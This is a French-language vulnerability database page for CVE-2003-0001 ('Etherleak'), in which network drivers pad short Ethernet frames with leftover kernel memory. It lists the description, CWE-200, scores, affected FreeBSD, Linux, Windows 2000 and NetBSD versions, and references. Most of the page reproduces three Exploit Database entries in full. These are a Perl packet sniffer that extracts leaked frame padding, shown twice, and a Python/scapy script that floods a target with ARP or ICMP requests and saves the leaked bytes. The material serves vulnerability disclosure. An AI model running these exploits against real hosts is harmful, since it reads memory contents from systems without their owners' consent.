CVE-2003-0001 : Détail

CVE-2003-0001

A01-Broken Access Control
1.62%V4
Network
2003-01-08
04h00 +00:00
2018-10-19
12h57 +00:00
CVE.org
NVD
Notifications pour un CVE
Restez informé de toutes modifications pour un CVE spécifique.
Gestion des notifications

Descriptions du CVE

Multiple ethernet Network Interface Card (NIC) device drivers do not pad frames with null bytes, which allows remote attackers to obtain information from previous packets or kernel memory by using malformed packets, as demonstrated by Etherleak.

Informations du CVE

Faiblesses connexes

CWE-ID Nom de la faiblesse Source
CWE-200 Exposure of Sensitive Information to an Unauthorized Actor
The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information.

Métriques

Métriques Score Gravité CVSS Vecteur Source
V2 5 AV:N/AC:L/Au:N/C:P/I:N/A:N nvd@nist.gov

EPSS

EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.

Score EPSS

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Percentile EPSS

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.
EPSS First.org

Informations sur l'Exploit

Exploit Database EDB-ID : 22131

Date de publication : 2007-03-22 23h00 +00:00
Auteur : Jon Hart
EDB Vérifié : Yes

source: https://www.securityfocus.com/bid/6535/info Network device drivers for several vendors have been reported to disclose potentially sensitive information to attackers. Frames that are smaller than the minimum frame size should have the unused portion of the frame buffer padded with null (or other) bytes. Some device drivers fail to do this adequately, leaving the data that was stored in the memory comprising the buffer prior to its use intact. Consequently, this data may be transmitted within frames across Ethernet segments. Since the Ethernet frame buffer is allocated in kernel memory space, sensitive data may be leaked. Cisco has stated that the IOS 12.1 and 12.2 trains are not affected. National Semiconductor Ethernet controller chips are not vulnerable to this issue. #!/usr/bin/perl -w # etherleak, code that has been 5 years coming. # # On 04/27/2002, I disclosed on the Linux Kernel Mailing list, # a vulnerability that would be come known as the 'etherleak' bug. In # various situations an ethernet frame must be padded to reach a specific # size or fall on a certain boundary. This task is left up to the driver # for the ethernet device. The RFCs state that this padding must consist # of NULLs. The bug is that at the time and still to this day, many device # drivers do not pad will NULLs, but rather pad with unsanitized portions # of kernel memory, oftentimes exposing sensitive information to remote # systems or those savvy enough to coerce their targets to do so. # # Proof of this can be found by googling for 'warchild and etherleak', or # by visiting: # # http://lkml.org/lkml/2002/4/27/101 # # This was ultimately fixed in the Linux kernel, but over time this # vulnerability reared its head numerous times, but at the core the # vulnerability was the same as the one I originally published. The most # public of these was CVE-2003-0001, which was assigned to address an # official @stake advisory. # # This code can be found its most current form at: # # http://spoofed.org/files/exploits/etherleak # # Jon Hart <jhart@spoofed.org>, March 2007 # use strict; use diagnostics; use warnings; use Getopt::Long; use Net::Pcap; use NetPacket::Ethernet qw(:ALL); use NetPacket::IP qw(:ALL); my %opts = (); my ($iface, $err, $pcap_t, $pcap_save, $filter_string); GetOptions( \%opts, 'help', 'filter=s', 'interface=s', 'quiet', 'read=s', 'write=s', 'verbose') or die "Unknown option: $!\n" && &usage(); if (defined($opts{'help'})) { &usage(); exit(0); } if (defined($opts{'read'})) { $pcap_t = Net::Pcap::open_offline($opts{'read'}, \$err); if (!defined($pcap_t)) { print("Net::Pcap::open_offline failed: $err\n"); exit 1; } } else { if (defined($opts{'interface'})) { $iface = $opts{'interface'}; } else { $iface = Net::Pcap::lookupdev(\$err); if (defined($err)) { print(STDERR "lookupdev() failed: $err\n"); exit(1); } else { print(STDERR "No interface specified. Using $iface\n"); } } $pcap_t = Net::Pcap::open_live($iface, 65535, 1, 0, \$err); if (!defined($pcap_t)) { print("Net::Pcap::open_live failed on $iface: $err\n"); exit 1; } } my $filter; if (Net::Pcap::compile($pcap_t, \$filter, defined($opts{'filter'}) ? $opts{'filter'} : "", 0, 0) == -1) { printf("Net::Pcap::compile failed: %s\n", Net::Pcap::geterr($pcap_t)); exit(1); } if (Net::Pcap::setfilter($pcap_t, $filter) == -1) { printf("Net::Pcap::setfilter failed: %s\n", Net::Pcap::geterr($pcap_t)); exit(1); } if (defined($opts{'write'})) { $pcap_save = Net::Pcap::dump_open($pcap_t, $opts{'write'}); if (!defined($pcap_save)) { printf("Net::Pcap::dump_open failed: %s\n", Net::Pcap::geterr($pcap_t)); exit(1); } } Net::Pcap::loop($pcap_t, -1, \&process, "foo"); Net::Pcap::close($pcap_t); if (defined($opts{'write'})) { Net::Pcap::dump_close($pcap_save); } sub process { my ($user, $hdr, $pkt) = @_; my ($link, $ip); my $jump = 0; my $datalink = Net::Pcap::datalink($pcap_t); if ($datalink == 1) { $jump += 14; } elsif ($datalink == 113) { $jump += 16; } else { printf("Skipping datalink $datalink\n"); return; } my $l2 = NetPacket::Ethernet->decode($pkt); if ($l2->{type} == ETH_TYPE_IP) { $ip = NetPacket::IP->decode(eth_strip($pkt)); $jump += $ip->{len}; } elsif ($l2->{type} == ETH_TYPE_ARP) { $jump += 28; } else { # assume 802.3 ethernet, and just jump ahead the length for ($l2->{dest_mac}) { if (/^0180c200/) { # spanning tree # l2->{type} here will actually be the length. HACK. $jump += $l2->{type}; } elsif (/^01000ccccc/) { # CDP/VTP/DTP/PAgP/UDLD/PVST, etc # l2->{type} here will actually be the length. HACK. $jump += $l2->{type}; } elsif (/^ab0000020000/) { # DEC-MOP-Remote-Console return; } else { # loopback if ($l2->{src_mac} eq $l2->{dest_mac}) { return; } printf("Skipping datalink $datalink l2 type %s\n", $l2->{type}); return; } } } if ($hdr->{len} > $jump) { my $trailer_bin = substr($pkt, $jump); my $trailer_hex = ""; my $trailer_ascii = ""; foreach (split(//, $trailer_bin)) { $trailer_hex .= sprintf("%02x", ord($_)); if (ord($_) >= 32 && ord($_) <= 126) { $trailer_ascii .= $_; } else { $trailer_ascii .= "."; } } # ignore all trailers that are just single characters repeated. # most OS' use 0, F, 5 or a. unless ($trailer_hex =~ /^(0|5|f|a)\1*$/i) { unless ($opts{'quiet'}) { print("#"x80, "\n"); printf("%s -> %s\n", $l2->{src_mac}, $l2->{dest_mac}); if ($l2->{type} == ETH_TYPE_IP) { printf("%s -> %s\n", $ip->{src_ip}, $ip->{dest_ip}); } } print("$trailer_hex\t$trailer_ascii\n"); if (defined($opts{'write'})) { Net::Pcap::dump($pcap_save, $hdr, $pkt); } } } } sub usage { print <<EOF; $0 -- A demonstration of the infamous 'etherleak' bug. CVE-2003-0001, and countless repeats of the same vulnerability. Options: [-h|--help] # this message [-i|--interface] <interface> # interface to listen on [-f|--filter] <pcap filter> # apply this filter to the traffic [-r|--read] <path to pcap> # read from this saved pcap file [-w|--write] <path to pcap> # write tothis saved pcap file [-q|--quiet] # be quiet [-v|--verbose] # be verbose EOF } # milw0rm.com [2007-03-23]
Exploit Database EDB-ID : 26076

Date de publication : 2013-06-09 22h00 +00:00
Auteur : prdelka
EDB Vérifié : No

#!/usr/bin/env python # CVE-2003-0001 'Etherleak' exploit # ================================= # Exploit for hosts which use a network device driver that pads # ethernet frames with data which vary from one packet to another, # likely taken from kernel memory, system memory allocated to # the device driver, or a hardware buffer on its network interface # card. Exploit uses scapy with either ICMP or ARP requests as # this can trigger with either but ICMP can hit layer3 filtering # rules. Using ARP the padding appears to leak only fixed constant # values when exploited, ICMP leaks random bytes. # # root@bt:~/0d# python cve-2003-0001.py x.x.x.254 icmp leaky # WARNING: No route found for IPv6 destination :: (no default route?) # [ CVE-2003-0001 'Etherleak' exploit # [ Attacking x.x.x.254 for icmp padding saved to leaky.hex # ............................................................^C!Killing # !Killing # root@bt:~/0d# hexdump -C leaky | head # 00000000 e6 bd a6 9b 90 eb 44 f5 18 a5 29 2a 16 5a 08 ff |......D...)*.Z..| # 00000010 43 e1 23 07 8f 96 5a 24 3f 3d 33 7d b4 97 7e 18 |C.#...Z$?=3}..~.| # 00000020 05 c9 7c 2c a5 c0 fa 7a 76 f3 51 c0 fe 07 72 32 |..|,...zv.Q...r2| # 00000030 9e ad 6a 67 ad 43 58 17 60 43 bc 2b b8 fb cc 70 |..jg.CX.`C.+...p| # 00000040 99 92 80 84 03 03 6f 8f 18 d3 5b 5e f0 1e 3a 83 |......o...[^..:.| # 00000050 3d 82 e7 cd 3e 1f 31 74 b0 06 8c a2 7e 14 6b fb |=...>.1t....~.k.| # 00000060 72 9b ac 64 74 9b a4 d9 23 5b 92 82 0d 0b 31 f0 |r..dt...#[....1.| # 00000070 a9 4f dd 3f bf 2b 5c 67 6c 22 fa da d0 2b d6 39 |.O.?.+\gl"...+.9| # 00000080 40 58 13 4f 3d bb 48 03 d3 53 3c 5c 44 d2 3d b2 |@X.O=.H..S<\D.=.| # 00000090 4f f2 a9 4a 02 80 4e 1b 6c bd 69 89 bd 76 1b 0a |O..J..N.l.i..v..| # # This issue has been resolved in ASA 8.4.4.6/8.2.5.32. Cisco Bug reference # is CSCua88376 and PSIRT-0669464365. # # -- prdelka # import os import sys import signal import binascii from scapy.all import * def signalhandler(signal,id): print "!Killing" sys.exit(0) def spawn(host,type): if type == 'arp': send(ARP(pdst=host),loop=1,nofilter=1) elif type == 'icmp': send(IP(dst=host)/ICMP(type=8)/'x',loop=1,nofilter=1) if __name__ == "__main__": print "[ CVE-2003-0001 'Etherleak' exploit" signal.signal(signal.SIGINT,signalhandler) if len(sys.argv) < 4: print "[ No! Use with <host> <arp|icmp> <file>" sys.exit(1) type = sys.argv[2] if type == 'arp': pass elif type == 'icmp': pass else: print "Bad type!" sys.exit(0) pid = os.fork() if(pid): print "[ Attacking %s for %s padding saved to %s.hex" % (sys.argv[1],sys.argv[2],sys.argv[3]) spawn(sys.argv[1],sys.argv[2]) while True: if type == 'arp': myfilter = "host %s and arp" % sys.argv[1] elif type == 'icmp': myfilter = "host %s and icmp" % sys.argv[1] x = sniff(count=1,filter=myfilter,lfilter=lambda x: x.haslayer(Padding)) p = x[0] if type == 'arp': pad = p.getlayer(2) if type == 'icmp': pad = p.getlayer(4) leak = str(pad) hexfull = binascii.b2a_hex(leak) file = "%s.hex"%sys.argv[3] fdesc = open(file,"a") fdesc.write(hexfull + "\n") fdesc.close() # 32 bits leaked here for me. if type == 'icmp': bytes = leak[9:13] elif type == 'arp': bytes = leak[10:14] fdesc = open(sys.argv[3],"ab") fdesc.write(bytes) fdesc.close()
Exploit Database EDB-ID : 3555

Date de publication : 2007-03-22 23h00 +00:00
Auteur : Jon Hart
EDB Vérifié : Yes

#!/usr/bin/perl -w # etherleak, code that has been 5 years coming. # # On 04/27/2002, I disclosed on the Linux Kernel Mailing list, # a vulnerability that would be come known as the 'etherleak' bug. In # various situations an ethernet frame must be padded to reach a specific # size or fall on a certain boundary. This task is left up to the driver # for the ethernet device. The RFCs state that this padding must consist # of NULLs. The bug is that at the time and still to this day, many device # drivers do not pad will NULLs, but rather pad with unsanitized portions # of kernel memory, oftentimes exposing sensitive information to remote # systems or those savvy enough to coerce their targets to do so. # # Proof of this can be found by googling for 'warchild and etherleak', or # by visiting: # # http://lkml.org/lkml/2002/4/27/101 # # This was ultimately fixed in the Linux kernel, but over time this # vulnerability reared its head numerous times, but at the core the # vulnerability was the same as the one I originally published. The most # public of these was CVE-2003-0001, which was assigned to address an # official @stake advisory. # # This code can be found its most current form at: # # http://spoofed.org/files/exploits/etherleak # # Jon Hart <jhart@spoofed.org>, March 2007 # use strict; use diagnostics; use warnings; use Getopt::Long; use Net::Pcap; use NetPacket::Ethernet qw(:ALL); use NetPacket::IP qw(:ALL); my %opts = (); my ($iface, $err, $pcap_t, $pcap_save, $filter_string); GetOptions( \%opts, 'help', 'filter=s', 'interface=s', 'quiet', 'read=s', 'write=s', 'verbose') or die "Unknown option: $!\n" && &usage(); if (defined($opts{'help'})) { &usage(); exit(0); } if (defined($opts{'read'})) { $pcap_t = Net::Pcap::open_offline($opts{'read'}, \$err); if (!defined($pcap_t)) { print("Net::Pcap::open_offline failed: $err\n"); exit 1; } } else { if (defined($opts{'interface'})) { $iface = $opts{'interface'}; } else { $iface = Net::Pcap::lookupdev(\$err); if (defined($err)) { print(STDERR "lookupdev() failed: $err\n"); exit(1); } else { print(STDERR "No interface specified. Using $iface\n"); } } $pcap_t = Net::Pcap::open_live($iface, 65535, 1, 0, \$err); if (!defined($pcap_t)) { print("Net::Pcap::open_live failed on $iface: $err\n"); exit 1; } } my $filter; if (Net::Pcap::compile($pcap_t, \$filter, defined($opts{'filter'}) ? $opts{'filter'} : "", 0, 0) == -1) { printf("Net::Pcap::compile failed: %s\n", Net::Pcap::geterr($pcap_t)); exit(1); } if (Net::Pcap::setfilter($pcap_t, $filter) == -1) { printf("Net::Pcap::setfilter failed: %s\n", Net::Pcap::geterr($pcap_t)); exit(1); } if (defined($opts{'write'})) { $pcap_save = Net::Pcap::dump_open($pcap_t, $opts{'write'}); if (!defined($pcap_save)) { printf("Net::Pcap::dump_open failed: %s\n", Net::Pcap::geterr($pcap_t)); exit(1); } } Net::Pcap::loop($pcap_t, -1, \&process, "foo"); Net::Pcap::close($pcap_t); if (defined($opts{'write'})) { Net::Pcap::dump_close($pcap_save); } sub process { my ($user, $hdr, $pkt) = @_; my ($link, $ip); my $jump = 0; my $datalink = Net::Pcap::datalink($pcap_t); if ($datalink == 1) { $jump += 14; } elsif ($datalink == 113) { $jump += 16; } else { printf("Skipping datalink $datalink\n"); return; } my $l2 = NetPacket::Ethernet->decode($pkt); if ($l2->{type} == ETH_TYPE_IP) { $ip = NetPacket::IP->decode(eth_strip($pkt)); $jump += $ip->{len}; } elsif ($l2->{type} == ETH_TYPE_ARP) { $jump += 28; } else { # assume 802.3 ethernet, and just jump ahead the length for ($l2->{dest_mac}) { if (/^0180c200/) { # spanning tree # l2->{type} here will actually be the length. HACK. $jump += $l2->{type}; } elsif (/^01000ccccc/) { # CDP/VTP/DTP/PAgP/UDLD/PVST, etc # l2->{type} here will actually be the length. HACK. $jump += $l2->{type}; } elsif (/^ab0000020000/) { # DEC-MOP-Remote-Console return; } else { # loopback if ($l2->{src_mac} eq $l2->{dest_mac}) { return; } printf("Skipping datalink $datalink l2 type %s\n", $l2->{type}); return; } } } if ($hdr->{len} > $jump) { my $trailer_bin = substr($pkt, $jump); my $trailer_hex = ""; my $trailer_ascii = ""; foreach (split(//, $trailer_bin)) { $trailer_hex .= sprintf("%02x", ord($_)); if (ord($_) >= 32 && ord($_) <= 126) { $trailer_ascii .= $_; } else { $trailer_ascii .= "."; } } # ignore all trailers that are just single characters repeated. # most OS' use 0, F, 5 or a. unless ($trailer_hex =~ /^(0|5|f|a)\1*$/i) { unless ($opts{'quiet'}) { print("#"x80, "\n"); printf("%s -> %s\n", $l2->{src_mac}, $l2->{dest_mac}); if ($l2->{type} == ETH_TYPE_IP) { printf("%s -> %s\n", $ip->{src_ip}, $ip->{dest_ip}); } } print("$trailer_hex\t$trailer_ascii\n"); if (defined($opts{'write'})) { Net::Pcap::dump($pcap_save, $hdr, $pkt); } } } } sub usage { print <<EOF; $0 -- A demonstration of the infamous 'etherleak' bug. CVE-2003-0001, and countless repeats of the same vulnerability. Options: [-h|--help] # this message [-i|--interface] <interface> # interface to listen on [-f|--filter] <pcap filter> # apply this filter to the traffic [-r|--read] <path to pcap> # read from this saved pcap file [-w|--write] <path to pcap> # write tothis saved pcap file [-q|--quiet] # be quiet [-v|--verbose] # be verbose EOF } # milw0rm.com [2007-03-23]

Products Mentioned

Configuraton 0

Freebsd>>Freebsd >> Version 4.2

Freebsd>>Freebsd >> Version 4.3

Freebsd>>Freebsd >> Version 4.4

Freebsd>>Freebsd >> Version 4.5

Freebsd>>Freebsd >> Version 4.6

Freebsd>>Freebsd >> Version 4.7

Linux>>Linux_kernel >> Version 2.4.1

Linux>>Linux_kernel >> Version 2.4.2

Linux>>Linux_kernel >> Version 2.4.3

Linux>>Linux_kernel >> Version 2.4.4

Linux>>Linux_kernel >> Version 2.4.5

Linux>>Linux_kernel >> Version 2.4.6

Linux>>Linux_kernel >> Version 2.4.7

Linux>>Linux_kernel >> Version 2.4.8

Linux>>Linux_kernel >> Version 2.4.9

Linux>>Linux_kernel >> Version 2.4.10

Linux>>Linux_kernel >> Version 2.4.11

Linux>>Linux_kernel >> Version 2.4.12

Linux>>Linux_kernel >> Version 2.4.13

Linux>>Linux_kernel >> Version 2.4.14

Linux>>Linux_kernel >> Version 2.4.15

Linux>>Linux_kernel >> Version 2.4.16

Linux>>Linux_kernel >> Version 2.4.17

Linux>>Linux_kernel >> Version 2.4.18

Linux>>Linux_kernel >> Version 2.4.19

Linux>>Linux_kernel >> Version 2.4.20

Microsoft>>Windows_2000 >> Version *

Microsoft>>Windows_2000 >> Version *

Microsoft>>Windows_2000 >> Version *

Microsoft>>Windows_2000_terminal_services >> Version *

Microsoft>>Windows_2000_terminal_services >> Version *

Microsoft>>Windows_2000_terminal_services >> Version *

Netbsd>>Netbsd >> Version 1.5

Netbsd>>Netbsd >> Version 1.5.1

Netbsd>>Netbsd >> Version 1.5.2

Netbsd>>Netbsd >> Version 1.5.3

Netbsd>>Netbsd >> Version 1.6

Références

http://www.securitytracker.com/id/1031583
Tags : vdb-entry, x_refsource_SECTRACK
http://www.osvdb.org/9962
Tags : vdb-entry, x_refsource_OSVDB
http://www.redhat.com/support/errata/RHSA-2003-088.html
Tags : vendor-advisory, x_refsource_REDHAT
http://marc.info/?l=bugtraq&m=104222046632243&w=2
Tags : mailing-list, x_refsource_BUGTRAQ
http://www.kb.cert.org/vuls/id/412115
Tags : third-party-advisory, x_refsource_CERT-VN
http://www.redhat.com/support/errata/RHSA-2003-025.html
Tags : vendor-advisory, x_refsource_REDHAT
http://secunia.com/advisories/7996
Tags : third-party-advisory, x_refsource_SECUNIA
http://www.atstake.com/research/advisories/2003/a010603-1.txt
Tags : vendor-advisory, x_refsource_ATSTAKE
http://www.securitytracker.com/id/1040185
Tags : vdb-entry, x_refsource_SECTRACK